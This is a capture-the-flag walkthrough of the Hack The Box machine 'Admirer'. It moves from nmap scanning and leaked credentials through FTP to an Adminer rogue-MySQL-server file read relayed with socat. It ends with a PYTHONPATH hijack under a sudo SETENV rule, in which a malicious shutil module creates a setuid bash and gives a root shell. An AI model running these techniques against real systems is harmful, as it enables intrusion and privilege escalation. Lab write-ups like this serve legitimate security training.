Admirer
Admirer

NMAP
...

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-28 10:33 IST
Nmap scan report for 10.10.10.187
Host is up (0.088s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-28 10:33 IST
Nmap scan report for 10.10.10.187
Host is up (0.087s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-title: Admirer
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

HTTP
...

Feroxbuster on port 80

Pasted image 20240128104457.png

credentials.txt->

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

contacts.txt

##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

Got into ftp with above creds

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||41624|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0            3405 Dec 02  2019 dump.sql
-rw-r--r--    1 0        0         5270987 Dec 03  2019 html.tar.gz
226 Directory send OK.
ftp> get *

extracted the .tar.gz file, it looked like a www dir but I think its old or it some other web server because there is no admin-dir /
Pasted image 20240128105156.png

db_admin.php

➜  utility-scripts cat db_admin.php 
<?php
  $servername = "localhost";
  $username = "waldo";
  $password = "Wh3r3_1s_w4ld0?";

  // Create connection
  $conn = new mysqli($servername, $username, $password);

  // Check connection
  if ($conn->connect_error) {
      die("Connection failed: " . $conn->connect_error);
  }
  echo "Connected successfully";


  // TODO: Finish implementing this or find a better open source alternative
?>

Admin_task.php
Pasted image 20240128115818.png

I spent time here but I was not able to execute code.

db_admin.php was missing
Pasted image 20240128115912.png

So i started to fuzz for db.php
Pasted image 20240128120600.png

Pasted image 20240128120617.png

I tried to log in with credentials we have found till now, but no luck.

but in server if we give our ip and start a nc listener on port 3306 it connects to us
Pasted image 20240128185950.png

the version 4.6.2 is vulnerable

I ll start my mysql server and use it to authenticate to the target.

GRANT ALL PRIVILEGES ON *.* TO root@10.10.10.187 IDENTIFIED by 'HelloThere' WITH
 GRANT OPTION;

create database hello;

use hello;

CREATE TABLE exfil (data VARCHAR(256));

Pasted image 20240128191125.png

I got connection refused
Pasted image 20240128191313.png

Its because mysql does not listen on routable interface.

I ll use socat but first I ll edit /etc/mysql/mariadb.conf.d/50-server.cnf as look at the file
Pasted image 20240128191626.png

the bind-address is 127.0.0.1 the problem here is that when i ll use socat it will think that even when I am making the request from target machine it ll think its localhost. quite complicated look the below image.
➜ Admirer socat TCP-LISTEN:3306,fork,bind=10.10.14.10 TCP:127.0.0.1:3306
When I made connection from the site->
Pasted image 20240128191925.png

ctflover@localhost is the problem.

so I have to change 127.0.0.1 to 0.0.0.0

Restart the mysql service.

Pasted image 20240128194106.png

sql command
Pasted image 20240128194207.png

This Article explains how to exploit this.

Get index.php in the table we created exfil.
Pasted image 20240128195201.png

select * from hello.exfil;
Pasted image 20240128195407.png

We found a password in this index.php this one is different from before
Pasted image 20240128195530.png

I ll use this creds to login to ssh.

This password works.
Pasted image 20240128195614.png

waldo@admirer:/opt/scripts$ sudo -l
[sudo] password for waldo: 
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh
waldo@admirer:/opt/scripts$

we can run The admin_task.sh as root and also set environment variables while running it with sudo.
Pasted image 20240128200439.png

Its running backup.py
Pasted image 20240128200500.png

Strategy ->

We ll make our shutil.py and make a function make_archive which will be malicious.
This can be done because we have SETENV Permission.

My shutils.py in /dev/shm

import os
def make_archive(a,b,c):
  os.system("bash -c 'cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash'")

waldo@admirer:/dev/shm$ sudo PYTHONPATH=/dev/shm /opt/scripts/admin_tasks.sh 

[[[ System Administration Menu ]]]
1) View system uptime
2) View logged in users
3) View crontab
4) Backup passwd file
5) Backup shadow file
6) Backup web data
7) Backup DB
8) Quit
Choose an option: 6
Running backup script in the background, it might take a while...

waldo@admirer:/tmp$ ./bash -p
bash-4.4# cd /root
bash-4.4# cat root.txt
4857966b101076c4ee3795a7a3d14007
bash-4.4#
Interactive Graph
Table Of Contents

NMAP

HTTP